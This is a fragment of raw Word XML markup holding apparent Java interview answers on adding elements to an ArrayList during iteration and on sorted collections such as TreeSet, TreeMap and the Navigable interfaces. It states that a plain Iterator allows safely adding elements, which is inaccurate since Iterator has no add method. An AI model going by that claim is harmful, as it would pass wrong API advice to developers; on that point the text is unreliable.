          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pag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atabases</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that store data externally rather than in memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A084880" w14:textId="1F94998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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B05101A"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6" w:name="_Toc197867410"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How can we add data while iterating ArrayList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="196"/>
    </w:p>
    <w:p w14:paraId="34E96646" w14:textId="02C5551F" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD00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dding data to an ArrayList while iterating over it can be tricky, especially when using an iterator. This is because modifying the list (e.g., adding or removing elements) during iteration can result in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if you're using a standard for-each loop or an iterator in certain cases. However, there are ways to safely add data while iterating over an ArrayList.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79055C4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approaches to safely add data while iterating through an ArrayList:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB1E942"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an Explicit Iterator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4E5E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terator allows you to safely modify the list (by adding or removing elements) during iteration, as long as you handle the add method properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1285455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DC29E8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4E48A584" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="540298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02953E1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7C75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BB040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39A7CF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8BA38A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B1C155D" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F6C818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terator to safely add elements while iterating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B2E63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Integer&gt; iterator = list.iterator();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A36F70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39B02EC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36FF2A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7604247F" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17F9212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new elements while iterating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B78FF1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7BDE610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new element to the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3E382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D9A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186CC" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="733D33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0DEAA50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CAD66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1640C"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 ListIterator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B806C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Iterator can be used if you want to add data while iterating, as it provides methods like add() and remove() that allow safe modification of the list while iterating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E9327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5442238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Iterator;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085A98BD" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16A24D3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B785C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7D516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9A7C3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33F7F72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4AD28B8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0A3FC8DC" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C095B5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ListIterator to add data while iterating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E01F40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Iterator&lt;Integer&gt; iterator = list.listIterator();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFB2E5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E2EC2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62D89C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2AE8C698" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F177D7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safely add new elements while iterating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0334828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07FBE5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add(4);  // Adding new element while iterating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB61F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D9863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FF772D" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="028BC8D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47A4FBF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62B8A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2B690"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an Index-Based for Loop (with caution):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6532684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A5640DF" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A035F3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E6971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F28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811DE2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084075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41941B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7F9A433" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F1D194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ndex-based for loop to avoid ConcurrentModificationException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5EE5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list.size(); i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A76C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list.get(i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FEDA1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66018563" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="636709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new elements after certain conditions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E141A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69FD60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a new element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE336F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  // Decrementing the index to avoid skipping elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BFAF5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B582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2CA8F" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C31AC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78BE76E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E38A1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35E4BB"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a Separate List for New Elements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7794B9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other approach is to collect the new elements in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>separate list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> while iterating, and then add them to the original list after the iteration is complete. This avoids modifying the list while iterating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F935B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31D136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7F2D24" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52F391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51AEF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5FED0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C14395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EE8DA1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16032DC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1300C09B" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE9B77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toAdd = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072F9903" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="480DC09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terate through the list, collect new elements in a separate list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A212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eger element : list) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB3956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3A772B05" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08BA24C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682298F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Add.add(4);  // Collect new element to be added later</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125373C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C912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93711" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB2865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new elements after the iteration is complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD827C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ll(toAdd);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117B8A83" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B7D8F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2AF3CED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204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AA8D4" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CD0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FDEF7">
          <v:rect id="_x0000_i1576" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="297BC581"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C549C57"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Concurrent Modification</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Directly modifying an ArrayList (i.e., adding or removing elements) while iterating with a for-each loop can cause a ConcurrentModificationException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FE6B1B"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Iterator or ListIterator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: These allow safe modification of the list during iteration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5FB8CF"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y After Iteration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Collect changes in a separate list and add them afterward if you don't want to modify the list while iterating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2641BA69" w14:textId="77777777" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00CD0003">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By following these approaches, you can safely add data to an ArrayList while iterating through it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E85459" w14:textId="057BC2B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77" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFE0D8F"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7" w:name="_Toc197867411"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain sorted collections in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="197"/>
    </w:p>
    <w:p w14:paraId="1EC0A34A" w14:textId="0C1B39B8" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990A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planation of the key sorted collections in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AD716C"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edSet Interface (e.g., TreeSet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E537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Set is a subtype of the Set interface that ensures the elements in the collection are sorted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648BCF06" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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elements that implement the Comparable interface, such as Integer, String, etc., the TreeSet will sort them in their natural order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1535EC35"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If you want to define a custom sorting order, you can pass a Comparator to the TreeSet constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B35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B53A5F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312A4D6" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D4A70B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Example {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD4226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38D38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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3317195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834D74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3E33BE7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621EEF36" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57CBE0D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 + set);  // Output: [1, 2, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437DFD2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5365F24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D36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5AF99E1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531CEDD" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52D9C2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CustomOrdering {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FC67D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293F6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Comparator.reverseOrder());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757171F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C2EB3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469BBA8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5F4ED0CF" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DAD8F4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reverse order): " + set);  // Output: [3, 2, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365DACB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B6FAB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BCEDFD"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edMap Interface (e.g., TreeMap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B02BC8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Map is a subtype of the Map interface that ensures the keys in the map are sorted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63077B08" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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keys that implement Comparable, the keys will be sorted in their natural order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137D803F"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You can pass a custom Comparator when creating the TreeMap to define the sorting behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ADB9F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3C330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21D6367" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C7B53D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Example {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424B33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A12B0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FCD1D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1309E5E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7DC520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E83D702" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72DC1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 + map);  // Output: {Apple=1, Banana=2, Orange=3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0173E6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6E30E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576AA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20A398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F252965" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FB1E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CustomOrdering {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38003A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DA489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Comparator.reverseOrder());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002094B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7CF5F6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03059F5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9BEE04B" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AAF513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reverse order): " + map);  // Output: {Orange=3, Banana=2, Apple=1}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CCD0F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7984C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E8639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NavigableSet Interface (e.g., TreeSet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2442989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CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Since TreeSet implements both SortedSet and NavigableSet, it provides additional methods to navigate through elements, such as lower(), higher(), ceiling(), floor(), etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66914D4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F4EA2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B00B63" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AB19E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SetExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1F027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AD8A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Set&lt;Integer&gt; set = new TreeSet&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9CE9D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61C32F2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7F59DE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44B85900" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F3B2E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set: " + set);  // Output: [1, 2, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C839FA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3: " + set.lower(3));  // Output: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709078A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2: " + set.higher(2));  // Output: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71714DD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C54EA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668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avigableMap Interface (e.g., TreeMap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A196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Map is a more specialized interface that extends SortedMap and adds methods to navigate the map, such as retrieving the nearest lower or higher key, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2014582C" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Since TreeMap implements both SortedMap and NavigableMap, it provides methods like lowerKey(), higherKey(), ceilingKey(), floorKey(), etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4787468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A9B23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827980B" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="120095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MapExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B695A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B4C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Map&lt;String, Integer&gt; map = new TreeMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5979451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1C5CD1E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FEE8F5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6DFE14C8" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="004E1BF9" w:rsidP="00990ADD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
